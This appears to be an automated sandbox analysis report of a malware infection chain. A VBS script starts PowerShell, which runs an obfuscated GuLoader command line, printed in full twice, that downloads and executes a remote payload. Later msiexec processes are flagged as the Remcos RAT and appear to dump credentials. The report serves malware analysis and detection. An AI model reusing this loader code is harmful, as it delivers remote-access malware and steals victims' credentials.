                                                                              2024-12-31 08:28:53 UTC1369INData Raw: bb 38 92 22 d1 71 70 10 18 ab dc 22 7f 6f 1f a3 6f 49 30 83 f1 b6 ba 6e b7 50 08 bd 1e 58 39 ff 4f 37 27 9a 56 d6 3e b6 7a 22 47 09 a3 97 47 6e 0a e2 2a c4 58 b7 63 30 9d 45 23 a2 07 7f d8 7e 32 6f b4 de 35 5c 5f ce ff 3c 25 06 4b e0 ed 76 d0 91 8d 94 31 f6 1b 94 45 18 a8 b5 50 be d3 7e 4b 29 9a 18 ec 89 0e 95 6d 94 cb 9d 35 2a 29 e2 b1 e1 fc f4 ba c4 df b9 84 9e 4f 65 5b 09 ae 5d b6 75 dd c0 f0 2a 9f 56 d9 bb a7 4c f7 aa 4f e3 42 e3 a3 25 8e 55 c8 72 53 cc 36 24 a5 70 74 26 12 37 84 11 c6 06 9b 57 95 76 d9 c2 db 79 43 f8 03 df c7 a9 07 9d 6b 06 fb 9c 1d ad 29 e6 35 03 60 80 aa 27 7d 09 cb 21 1e eb 51 70 8e 58 30 ae c8 94 b0 07 1c 32 5b 76 7b d8 1c d5 07 51 43 48 77 8d 21 04 fb a4 82 b8 3a 29 27 3d 5b ad bb c6 11 3b 55 3d f7 2b 36 f5 8f 3f 2a 24 d5 54 29
                                                                              Data Ascii: 8"qp"ooI0nPX9O7'V>z"GGn*Xc0E#~2o5\_<%Kv1EP~K)m5*)Oe[]u*VLOB%UrS6$pt&7WvyCk)5`'}!QpX02[v{QCHw!:)'=[;U=+6?*$T)
                                                                              2024-12-31 08:28:53 UTC1369INData Raw: 1f d6 42 a9 e5 f7 f2 47 bc b3 70 5e 92 52 0e e1 8c 9c a1 1a 29 e6 21 51 92 0d 96 94 61 e4 c1 b5 5d ec 9d f9 f6 48 e4 15 18 0d b7 6f c7 af 6a 96 78 33 f2 c6 0d 3d 8a 90 bb 47 22 4f 09 1e 55 cd 9b 9e 9f 47 62 c1 01 75 75 af c7 9a ac d5 4a 82 b3 b3 a1 28 e2 e9 63 30 a9 45 b9 52 f8 80 03 c3 35 09 bb a2 a6 03 5d 50 eb 27 f6 71 64 34 7c c3 c4 a0 29 a8 ec 59 7b 3b 87 42 b0 b5 5c 7d bc 41 9b 5e d3 7d 03 74 78 2f 3c 49 05 5b 8d 5b 68 1e e1 82 44 5e 86 6a d7 1f 7b ba a0 8f 16 c6 f1 03 c7 e3 e4 87 a5 f8 b1 01 8f b9 a7 59 49 37 c8 14 36 99 1e 91 e9 5a bc 75 13 08 99 5b 1a 87 ca 80 6f 18 f7 8c c6 1d ce 95 ba a5 73 3c 3f a3 4a ef 17 43 3d dc fb eb 40 1e f8 2d 97 57 39 cc 7e 41 6d 3e 65 24 6a 0d 4d e1 6a 67 1c e1 a4 ca c3 00 66 9e b9 d7 b8 18 16 8f 0f 63 b3 b5 63 15 87
                                                                              Data Ascii: BGp^R)!Qa]Hojx3=G"OUGbuuJ(c0ER5]P'qd4|)Y{;B\}A^}tx/<I[[hD^j{YI76Zu[os<?JC=@-W9~Am>e$jMjgfcc
                                                                              2024-12-31 08:28:53 UTC1369INData Raw: a3 45 2a 9d 73 ec 05 26 7f 51 d8 4b c8 19 54 f9 aa 4f 02 c9 69 f6 1c 11 d9 bd 2b 0c b0 55 d8 93 c4 21 42 88 e5 1c f6 47 bc bb 70 18 6b a1 7b e3 14 3d 9d 6e 30 49 c9 83 0e 79 e6 e6 d3 13 d6 3a 22 17 6b a6 59 5b c0 69 0b 58 b4 b1 5f cc 7d 84 e1 21 cb 7c 7a e5 fe 28 cc cb 47 ce 95 83 a2 da e9 3e 30 33 27 65 e5 91 a1 96 77 9d fd 9e 28 86 b3 e6 a1 87 a7 e8 b9 87 5e 24 91 82 17 28 03 5b d5 21 b3 de 93 87 19 8e e7 f4 0c eb b4 40 3e 65 5a db 92 73 7f 58 e4 78 a5 d0 a2 c1 65 df 39 5e 6b a0 b1 e0 8e 16 e5 95 40 e0 60 bb 2c 37 d2 1d 32 16 1e be 71 1e 76 1f 0f ce 6f 99 ef 28 25 6e 58 c9 3b 66 0f 8c 04 02 8e 06 2d 59 5e aa b1 af ed 02 c0 d5 46 b2 77 7b 55 db 4e df d1 41 17 d0 3f 17 0d 99 eb 78 95 c2 79 94 74 b6 c8 a5 c1 99 df 8f 6b 34 52 83 e1 f1 4a 6a eb d9 0d 9f 84
                                                                              Data Ascii: E*s&QKTOi+U!BGpk{=n0Iy:"kY[iX_}!|z(G>03'ew(^$([!@>eZsXxe9^k@`,72qvo(%nX;f-Y^Fw{UNA?xytk4RJj
                                                                              2024-12-31 08:28:53 UTC1369INData Raw: 8a 46 d0 42 6b 3a e0 58 a7 06 b4 b0 9e 1f 25 e8 df 56 4c d1 f5 d3 d3 c2 67 6f de b9 4d 10 3c f0 2e 07 9f 54 a8 26 d7 2e d1 b5 b9 1a da 25 42 85 0e a4 1f 9f 3e 7d 65 dc 2c 4e 64 44 2f 36 6d 88 3a de c9 58 ce 26 78 b6 54 2f 50 ff af dd c8 56 89 67 5e b7 16 75 25 7f 18 79 98 46 75 67 e1 ac 6f f5 9d 56 48 27 bb d7 a0 54 6c 2a e1 bd 9c 6c 87 9d bf 4d 19 b0 7c e5 47 3b bb 5f 6c e3 96 12 e4 fa 71 d6 eb 29 c1 06 46 00 39 50 1a ba 6e 79 4c 8e b1 c4 b3 bf df b1 b8 37 33 59 f8 17 14 96 3d 82 c0 ef 84 35 df 05 17 76 20 6e 0c 86 f3 2b d0 9c 3e cf 6b 09 6f 3d 01 b7 51 60 73 f5 98 85 b4 7c 41 1c 84 81 09 e9 d8 e0 cd 1e d1 80 c5 d4 54 95 c5 c0 86 ff 8a cb bd b6 c0 bd 10 44 8a 45 5e c9 14 86 f0 73 de be c1 65 e0 c8 49 6b 7d eb 21 50 ad 66 9d 29 db 33 8e 77 67 6c a5 72 cc
                                                                              Data Ascii: FBk:X%VLgoM<.T&.%B>}e,NdD/6m:X&xT/PVg^u%yFugoVH'Tl*lM|G;_lq)F9PnyL73Y=5v n+>ko=Q`s|ATDE^seIk}!Pf)3wglr


                                                                              Click to jump to process

                                                                              Click to jump to process

                                                                              Click to dive into process behavior distribution

                                                                              Click to jump to process

                                                                              Target ID:0
                                                                              Start time:03:28:10
                                                                              Start date:31/12/2024
                                                                              Path:C:\Windows\System32\wscript.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\heteronymous.vbs"
                                                                              Imagebase:0x7ff72f3a0000
                                                                              File size:170'496 bytes
                                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:2
                                                                              Start time:03:28:11
                                                                              Start date:31/12/2024
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Alimentation; function Chirked($Hajji){$Forsorgslederne=4;$Xenos=$Forsorgslederne;do{$Lreanstalterne+=$Hajji[$Xenos];$Xenos+=5} until(!$Hajji[$Xenos])$Lreanstalterne}function Hypohyaline($banestrkning){ .($Elektriciteten) ($banestrkning)}$Crassitude=Chirked 'Bes nBoreE NeiTBipa.overW';$Crassitude+=Chirked 'Hob E ptobUnfeCfraglAl tiTeksEReban StjT';$Ruineringer=Chirked 'OplbMS inoBrynz utiambylforsl Pepa U i/';$Tikampens=Chirked 'B edTDuntlC tasNeop1 For2';$Trappeopgangen='Jan,[ NonNRa heAgriT Iag.PoetSsil e Ra RPre vNu.kIPredC ncoE ympMakrOVet,IFremNConttDobbMOve AHykenHem.aHe,sgGarre.itrrrefl] ase: Dra:SgdcS Feie UdtcSnabUKantrSgepiCapeTReenyRagopAl erInflo AksT UnboTinaCurfuoStanLSamv=Ernr$ScratHousIfarvkTipbAAffaMEurop S.keHngsnUdarS';$Ruineringer+=Chirked 'Over5Crul.Cell0 Ans P yc(C.xcW illi RepnIndidLakkoMasowTilrs rog MangN,aveT Kon Hemo1B oc0chir.Blat0 Sla;Strk isWAfkliUdt nSinu6Bomb4Vent;,obb Poinx il6Un r4 Tem;Jupe ForrEpopvTour:Tele1Mo,s3Trep1pil .Carb0 Liv)U.pr WallGUnsceParic SkukNonvoChem/Sauc2 Uci0Vrdi1Tand0Bro 0Kary1yngl0Pupp1Res TagsFIns iMat r IrieSubsffirmo nonxHvid/Exem1 rk3fodm1L,ge. O e0';$morgentaage=Chirked ' biluHypoSSproeTraeRGinh-Un ea DelgPreleAlr n Arbt';$Snyd=Chirked ' anehHjultA,ietAparpJacksudsl: rog/ Ops/GenbfSpidoPr,m2KiskxSammcSvig.Hin ichi cJvnguMa i/NonsyWismA,usivSupeXHin.CmonorFairQsnveD G u/ AtoMT areglyks Ya.tFingrresueCoaln TwidMesaeItab.Wunnt OveoTutsc';$Messieurs=Chirked 'Diss>';$Elektriciteten=Chirked 'DikiISanseFarbX';$Fungeres='Overfrsels';$Teleteknikken='\Mikadoerne124.Sty';Hypohyaline (Chirked ' urt$Dag,gSeisl.audo CosB R taAeroL.isa:Tm eIImprN O,etJag Uv ntidecoTProgI La O DirNA,greProdR ov.NSy eeInfosOct =Offc$ fskeSidenMin V pro:Fir.A Prep ForPS gidVa.saTalltDagnAment+Am,z$TindT HalEArmbLJeweELderTf,eee nankfysin ignITavikAd bKF geeKe ln');Hypohyaline (Chirked ' u s$ Ustg amblOceao.rilbPlanAsnowl C e:Che tPervHTappIUl mCEx,oK KreS ParEHetetR mm=Suff$Ly tsC cknS,miYMotodAnsv.BeamsLichp VanLMoniiNonrT A,a(Relo$ Hy,M RefERiskSAnakS Fa INaboEDuodUBe.eR Ma.sUlyk)');Hypohyaline (Chirked $Trappeopgangen);$Snyd=$thickset[0];$Antenners192=(Chirked 'P ys$ScugGKopulSt,gO BriBLaveaSuchlWilt:HvidnP ilOContNMellpUndeeOmherOraoc Je E.argPSensTMariIP isvHy.deK mpn ygESvens KlusProa= unNRickEFidiWAdsk-Fa kO SloBToppJPusleVgeaCAntitfor SikkSTrimYKerasSemitAcquEBr.mm Sha.Kart$ResucReoxRAareaGillsFadmsFil IMo.sT TauUU dgdTn,ee');Hypohyaline ($Antenners192);Hypohyaline (Chirked 'Halv$SerpN EyeoBimmn uttpS kkeChu rSkracMetaeFla,pInastBespi UnavB cye krnUkrneMachs rolsSemi.DrysHAntie K.eaHydrdMo.oe SalrF.easVi d[Aest$ TopmIncro Vi r LingSoeneperln,nsvtLandaMoseaThergGemoeG,mb] Reg= Sc.$ iddREddiu S aiAfgrnMisre PrerSamti GynnDepogFiskeSvalr');$Honorifical179=Chirked 'Clav$UnocN CuloRe in.vidpS.ape U sr CoucCalyeOddspPorctHydriHandvTilpeKompnIdoteret sKerssIvor.St rD Diso nsw ign Fo lkostoKaleaAffadAnsvFAbrai Re,l .ykeMult(Brin$ .miS CasnGramyUnmedNont,Unde$MegaSSiphpStereSkakcF krt AnerdenooTr,nf egrlNetvuIn eoLeisrmerki.alem.mpreTrekt.unde Ha,rKraf)';$Spectrofluorimeter=$Intuitionernes;Hypohyaline (Chirked ' Spu$UdkogUd ilBldgoSkarbBag.ATrkkLPubl:DummiBefobStore Spin FroHOlisoBesklEfteT ,haSByg FPa.nLta,ijBa,mTRefrELetuR PurN UnkEIn e2Co o0Supe1 yks=D.kk( suptKre.EsektsFo,fTSves- ndePb huablodtKlarHkara tak$EmposHosppNondEBudtCVandTPlanrs ibO uliF BolLdumpu SacO .inrSkdeIFrosMFr cEOvertCeroe Frur usl)');while (!$Ibenholtsfljterne201) {Hypohyaline (Chirked 'Hjae$Bryng A rlT nfo indb.emiaSmudl,ulg:NondiIsotnhibedRykksT,grk Lu yResed B enKo tiReinnre igG fteKr nnDebusSp d=Poly$P,ofANonipStadodroksE,fetend aBy ns RaniTr.ds.uto8Thr.9') ;Hypohyaline $Honorifical179;Hypohyaline (Chirked 'Ogh.S elltYmpnA MrkRGra tHete-Van s De.LUnfoEFjerEKbelpDdsd Allo4');Hypohyaline (Chirked ',jsk$SeriGEdgilUn uOFeltbIdolAGal lReda:SigniIndebCoune CapNA buHtrfooForbLHr vtOri sTri F UplL tupJStimtDe uE arrr ChaNw rmE Bra2Hagi0 ndk1Fast=Stra(UdbltRechEVestSs.idTTilb-VexipVikaaPa.lTHypohLes Ling$InvoS Malpwad,EPalaC PhaT IntrProloNotefAgt LAntiuunhuO Au.RDe.iIRenvm InteA.reT EufE SitRanti)') ;Hypohyaline (Chirked 'Imme$BadmGGasolBr mOSquibUdokaal eL s.o:ForgMFuglaVareT larAfsno AnkNEfte=Dist$BaraG,ediLAntiOl ndBPropaF rslSt.t: Kooi NonnoptitAdelEUpaarCub FSpreAGaricPatiT A,tICameOm.xon EliaSpecLJour+ O e+Bowl%Defe$ LarT BekHNedhiPlejC MarK IneSAmpuELnudTBag,. SencDi oO ammuTanaNLi eT') ;$Snyd=$thickset[$matron]}$Josines=293205;$Sensibiliseringens=30156;Hypohyaline (Chirked 'Opga$Drvag ubjl UdkoMazuBF jlABe pl oku: FanMHikkAUdrar Ko cP euiEfteODebin DisiOr,fTBe jIInfrc A r Frot=Arbe E,teG.setE ardT il-PallC Ko OMa.knPrect SkaeLoinnCrypt Kon Klap$S arsSk np BraEDiskc U sTSammrTapiOKny.fCos lErhvu Ateo mir HapIFlagMBortERefeT.elleSys,r');Hypohyaline (Chirked 'H rw$vaklgKrselChefo.helbFibeaVaadlSkal:OctaVBizouBrialJu,eg Maca EksrSuf,iF,kls nreU rirHerie.goidBunde ThesForl Ande= To Unun[AcidSStrayBa ns Bolt TileFejlmfuzz. nmeCOveroSal nFo,lv PlaeBl drTh atKurs]Inte:Inve:Un,eFG esrBalso AmtmHaemBSu eaBe,osOmkleWago6Ser,4InceS iptdromrSweei.uddnSunbg Cif(Tran$ MasMHm.gaOpinrTilecOn.uiBlegounspn Holi Al t NaniMa acAmts)');Hypohyaline (Chirked 'Aton$Bn sg DalLMalaOPalpbFutua egfLLder: mas,psinOberaD,mac VenKTrapSStu M on=Bu,b Imbr[C taSFortyAil,SO ertSavnEFlerm D c.KoncTInteEBaraxBrnetDrv ..ideE H lNPh,tcBehroUdmuDBetril.gaNBybeG Var]Slad: ,ac: F rALy.isWareC ,erInakni Sit.C rlG eneHalvtKr ksGrant ekgRundeiNoncNtringExpo( lai$Re oVBracuB ndLrowtG SkaAnrinR ogri UnwsTyskeObjurStume ,usdTillEPeriSUnel)');Hypohyaline (Chirked ' ca $ BilGEnkeLFremORho B P eaEk pL Thr: PresBli OC sevSeriE ebPLactUBestDPalae R.tnTaulS en= cha$TvrlSFremNEftea SkiCen,rKKnubSLens.Fls s elu PipBCo nsGardTManeR uctiDaahnC.oog,rek(Gero$Plu,jToffoEx,iSForeIBen n DexEHerrsF rm,Foul$ Sc S AccEStudnFo,kS Flai mskBHalvIEff lAfsliColeSamazENonmr TolITrvlNJoylgVeneE Disn ResSCapt)');Hypohyaline $Sovepudens;"
                                                                              Imagebase:0x7ff7be880000
                                                                              File size:452'608 bytes
                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.2295783227.0000020CEBC30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:3
                                                                              Start time:03:28:11
                                                                              Start date:31/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:4
                                                                              Start time:03:28:19
                                                                              Start date:31/12/2024
                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Alimentation; function Chirked($Hajji){$Forsorgslederne=4;$Xenos=$Forsorgslederne;do{$Lreanstalterne+=$Hajji[$Xenos];$Xenos+=5} until(!$Hajji[$Xenos])$Lreanstalterne}function Hypohyaline($banestrkning){ .($Elektriciteten) ($banestrkning)}$Crassitude=Chirked 'Bes nBoreE NeiTBipa.overW';$Crassitude+=Chirked 'Hob E ptobUnfeCfraglAl tiTeksEReban StjT';$Ruineringer=Chirked 'OplbMS inoBrynz utiambylforsl Pepa U i/';$Tikampens=Chirked 'B edTDuntlC tasNeop1 For2';$Trappeopgangen='Jan,[ NonNRa heAgriT Iag.PoetSsil e Ra RPre vNu.kIPredC ncoE ympMakrOVet,IFremNConttDobbMOve AHykenHem.aHe,sgGarre.itrrrefl] ase: Dra:SgdcS Feie UdtcSnabUKantrSgepiCapeTReenyRagopAl erInflo AksT UnboTinaCurfuoStanLSamv=Ernr$ScratHousIfarvkTipbAAffaMEurop S.keHngsnUdarS';$Ruineringer+=Chirked 'Over5Crul.Cell0 Ans P yc(C.xcW illi RepnIndidLakkoMasowTilrs rog MangN,aveT Kon Hemo1B oc0chir.Blat0 Sla;Strk isWAfkliUdt nSinu6Bomb4Vent;,obb Poinx il6Un r4 Tem;Jupe ForrEpopvTour:Tele1Mo,s3Trep1pil .Carb0 Liv)U.pr WallGUnsceParic SkukNonvoChem/Sauc2 Uci0Vrdi1Tand0Bro 0Kary1yngl0Pupp1Res TagsFIns iMat r IrieSubsffirmo nonxHvid/Exem1 rk3fodm1L,ge. O e0';$morgentaage=Chirked ' biluHypoSSproeTraeRGinh-Un ea DelgPreleAlr n Arbt';$Snyd=Chirked ' anehHjultA,ietAparpJacksudsl: rog/ Ops/GenbfSpidoPr,m2KiskxSammcSvig.Hin ichi cJvnguMa i/NonsyWismA,usivSupeXHin.CmonorFairQsnveD G u/ AtoMT areglyks Ya.tFingrresueCoaln TwidMesaeItab.Wunnt OveoTutsc';$Messieurs=Chirked 'Diss>';$Elektriciteten=Chirked 'DikiISanseFarbX';$Fungeres='Overfrsels';$Teleteknikken='\Mikadoerne124.Sty';Hypohyaline (Chirked ' urt$Dag,gSeisl.audo CosB R taAeroL.isa:Tm eIImprN O,etJag Uv ntidecoTProgI La O DirNA,greProdR ov.NSy eeInfosOct =Offc$ fskeSidenMin V pro:Fir.A Prep ForPS gidVa.saTalltDagnAment+Am,z$TindT HalEArmbLJeweELderTf,eee nankfysin ignITavikAd bKF geeKe ln');Hypohyaline (Chirked ' u s$ Ustg amblOceao.rilbPlanAsnowl C e:Che tPervHTappIUl mCEx,oK KreS ParEHetetR mm=Suff$Ly tsC cknS,miYMotodAnsv.BeamsLichp VanLMoniiNonrT A,a(Relo$ Hy,M RefERiskSAnakS Fa INaboEDuodUBe.eR Ma.sUlyk)');Hypohyaline (Chirked $Trappeopgangen);$Snyd=$thickset[0];$Antenners192=(Chirked 'P ys$ScugGKopulSt,gO BriBLaveaSuchlWilt:HvidnP ilOContNMellpUndeeOmherOraoc Je E.argPSensTMariIP isvHy.deK mpn ygESvens KlusProa= unNRickEFidiWAdsk-Fa kO SloBToppJPusleVgeaCAntitfor SikkSTrimYKerasSemitAcquEBr.mm Sha.Kart$ResucReoxRAareaGillsFadmsFil IMo.sT TauUU dgdTn,ee');Hypohyaline ($Antenners192);Hypohyaline (Chirked 'Halv$SerpN EyeoBimmn uttpS kkeChu rSkracMetaeFla,pInastBespi UnavB cye krnUkrneMachs rolsSemi.DrysHAntie K.eaHydrdMo.oe SalrF.easVi d[Aest$ TopmIncro Vi r LingSoeneperln,nsvtLandaMoseaThergGemoeG,mb] Reg= Sc.$ iddREddiu S aiAfgrnMisre PrerSamti GynnDepogFiskeSvalr');$Honorifical179=Chirked 'Clav$UnocN CuloRe in.vidpS.ape U sr CoucCalyeOddspPorctHydriHandvTilpeKompnIdoteret sKerssIvor.St rD Diso nsw ign Fo lkostoKaleaAffadAnsvFAbrai Re,l .ykeMult(Brin$ .miS CasnGramyUnmedNont,Unde$MegaSSiphpStereSkakcF krt AnerdenooTr,nf egrlNetvuIn eoLeisrmerki.alem.mpreTrekt.unde Ha,rKraf)';$Spectrofluorimeter=$Intuitionernes;Hypohyaline (Chirked ' Spu$UdkogUd ilBldgoSkarbBag.ATrkkLPubl:DummiBefobStore Spin FroHOlisoBesklEfteT ,haSByg FPa.nLta,ijBa,mTRefrELetuR PurN UnkEIn e2Co o0Supe1 yks=D.kk( suptKre.EsektsFo,fTSves- ndePb huablodtKlarHkara tak$EmposHosppNondEBudtCVandTPlanrs ibO uliF BolLdumpu SacO .inrSkdeIFrosMFr cEOvertCeroe Frur usl)');while (!$Ibenholtsfljterne201) {Hypohyaline (Chirked 'Hjae$Bryng A rlT nfo indb.emiaSmudl,ulg:NondiIsotnhibedRykksT,grk Lu yResed B enKo tiReinnre igG fteKr nnDebusSp d=Poly$P,ofANonipStadodroksE,fetend aBy ns RaniTr.ds.uto8Thr.9') ;Hypohyaline $Honorifical179;Hypohyaline (Chirked 'Ogh.S elltYmpnA MrkRGra tHete-Van s De.LUnfoEFjerEKbelpDdsd Allo4');Hypohyaline (Chirked ',jsk$SeriGEdgilUn uOFeltbIdolAGal lReda:SigniIndebCoune CapNA buHtrfooForbLHr vtOri sTri F UplL tupJStimtDe uE arrr ChaNw rmE Bra2Hagi0 ndk1Fast=Stra(UdbltRechEVestSs.idTTilb-VexipVikaaPa.lTHypohLes Ling$InvoS Malpwad,EPalaC PhaT IntrProloNotefAgt LAntiuunhuO Au.RDe.iIRenvm InteA.reT EufE SitRanti)') ;Hypohyaline (Chirked 'Imme$BadmGGasolBr mOSquibUdokaal eL s.o:ForgMFuglaVareT larAfsno AnkNEfte=Dist$BaraG,ediLAntiOl ndBPropaF rslSt.t: Kooi NonnoptitAdelEUpaarCub FSpreAGaricPatiT A,tICameOm.xon EliaSpecLJour+ O e+Bowl%Defe$ LarT BekHNedhiPlejC MarK IneSAmpuELnudTBag,. SencDi oO ammuTanaNLi eT') ;$Snyd=$thickset[$matron]}$Josines=293205;$Sensibiliseringens=30156;Hypohyaline (Chirked 'Opga$Drvag ubjl UdkoMazuBF jlABe pl oku: FanMHikkAUdrar Ko cP euiEfteODebin DisiOr,fTBe jIInfrc A r Frot=Arbe E,teG.setE ardT il-PallC Ko OMa.knPrect SkaeLoinnCrypt Kon Klap$S arsSk np BraEDiskc U sTSammrTapiOKny.fCos lErhvu Ateo mir HapIFlagMBortERefeT.elleSys,r');Hypohyaline (Chirked 'H rw$vaklgKrselChefo.helbFibeaVaadlSkal:OctaVBizouBrialJu,eg Maca EksrSuf,iF,kls nreU rirHerie.goidBunde ThesForl Ande= To Unun[AcidSStrayBa ns Bolt TileFejlmfuzz. nmeCOveroSal nFo,lv PlaeBl drTh atKurs]Inte:Inve:Un,eFG esrBalso AmtmHaemBSu eaBe,osOmkleWago6Ser,4InceS iptdromrSweei.uddnSunbg Cif(Tran$ MasMHm.gaOpinrTilecOn.uiBlegounspn Holi Al t NaniMa acAmts)');Hypohyaline (Chirked 'Aton$Bn sg DalLMalaOPalpbFutua egfLLder: mas,psinOberaD,mac VenKTrapSStu M on=Bu,b Imbr[C taSFortyAil,SO ertSavnEFlerm D c.KoncTInteEBaraxBrnetDrv ..ideE H lNPh,tcBehroUdmuDBetril.gaNBybeG Var]Slad: ,ac: F rALy.isWareC ,erInakni Sit.C rlG eneHalvtKr ksGrant ekgRundeiNoncNtringExpo( lai$Re oVBracuB ndLrowtG SkaAnrinR ogri UnwsTyskeObjurStume ,usdTillEPeriSUnel)');Hypohyaline (Chirked ' ca $ BilGEnkeLFremORho B P eaEk pL Thr: PresBli OC sevSeriE ebPLactUBestDPalae R.tnTaulS en= cha$TvrlSFremNEftea SkiCen,rKKnubSLens.Fls s elu PipBCo nsGardTManeR uctiDaahnC.oog,rek(Gero$Plu,jToffoEx,iSForeIBen n DexEHerrsF rm,Foul$ Sc S AccEStudnFo,kS Flai mskBHalvIEff lAfsliColeSamazENonmr TolITrvlNJoylgVeneE Disn ResSCapt)');Hypohyaline $Sovepudens;"
                                                                              Imagebase:0x790000
                                                                              File size:433'152 bytes
                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.2500148834.00000000088E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.2473117058.0000000005C9D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.2500400610.000000000C61A000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:5
                                                                              Start time:03:28:19
                                                                              Start date:31/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:7
                                                                              Start time:03:28:41
                                                                              Start date:31/12/2024
                                                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                              Imagebase:0x6b0000
                                                                              File size:59'904 bytes
                                                                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000003.2616047029.0000000008465000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000003.2604704287.0000000008463000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.3434646364.000000000843B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.3434646364.0000000008465000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              Target ID:9
                                                                              Start time:03:28:58
                                                                              Start date:31/12/2024
                                                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fxqlydinmzxw"
                                                                              Imagebase:0x6b0000
                                                                              File size:59'904 bytes
                                                                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:10
                                                                              Start time:03:28:58
                                                                              Start date:31/12/2024
                                                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\prvvzwtgahpigxth"
                                                                              Imagebase:0x6b0000
                                                                              File size:59'904 bytes
                                                                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:11
                                                                              Start time:03:28:58
                                                                              Start date:31/12/2024
                                                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ztjoaodiophnilhlqlz"
                                                                              Imagebase:0x6b0000
                                                                              File size:59'904 bytes
                                                                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Reset < >
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2307234134.00007FF848D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D10000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_7ff848d10000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: HPH$HPH$HPH$HPH$HPH$HPH$HPH$HPH
                                                                                • API String ID: 0-1259028531
                                                                                • Opcode ID: 3856c57027c55dce2608894f38cf3b72d3b494562a448f83f3018589f026dded
